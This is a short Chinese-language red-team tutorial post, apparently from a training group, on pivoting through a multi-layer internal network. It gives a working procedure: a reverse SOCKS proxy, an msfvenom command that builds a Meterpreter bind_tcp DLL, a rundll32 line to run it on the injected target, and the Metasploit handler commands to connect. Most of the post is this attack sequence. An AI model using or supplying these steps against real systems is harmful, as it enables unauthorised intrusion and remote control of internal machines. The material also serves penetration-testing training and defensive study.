来自:5号黯区
5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net
深层内网无法转发出来,所以就用了代理加正向。
多层内网下的穿透,第一层建立反向Socks代理,把MSF代入代理去连接处在第二层的机器。
生成:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4433 -f dll >/root/meterpreter_bind_tcp_x64_4433.dll
通过各种手法注入到第二层的目标机器:
rundll32.exe meterpreter_bind_tcp_x64_4433.dll Start
连接:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
show options
set lport 4433
set rhost <Target_ip>
run
5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net
关于我们
5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net